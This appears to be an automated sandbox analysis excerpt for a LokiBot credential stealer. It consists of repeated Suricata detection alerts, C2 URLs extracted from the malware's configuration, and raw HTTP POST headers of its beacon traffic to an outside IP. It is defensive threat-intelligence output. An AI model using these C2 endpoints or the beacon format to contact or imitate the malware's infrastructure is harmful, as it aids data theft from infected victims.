Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49969
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49900 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49963 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49963 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49975 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49910 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49975 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49985
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49934 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49770
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49900 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49934 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49934 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49910 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49900
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50005
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49934 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49934 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50056 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49998
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49975 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49963
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49910 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50056 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50056 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49769
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49799 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49799 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49975 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49799 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49975 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49934
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50056 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50078 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50078 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50078 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49799 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50089 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50089 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50021 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50102 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49940
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50102 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49799 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50021 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49799
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50056 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49910 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50102 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49910 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50097 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50085 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50056
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50089 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50085 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50021 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50089 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50021 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50097 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50078 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50078 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49975
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50033 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50089 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50102 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50021 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50097 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49766
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50085 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50033
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50096 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50102 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50096 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50096 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49858 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50085 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50102
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50085 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50096 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50096 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50097 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50097 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50089
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49858 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50021
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49851 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50078
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49851 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50050 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49858 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49910
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49858 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49851 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49858 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50085
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50088 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50098 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50098 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50088 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50088 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50014 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50014 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50090 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50088 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50014 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49851 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50090 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50090 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49851 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50096
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49858
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50098 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50097

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.220 94.156.177.220

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
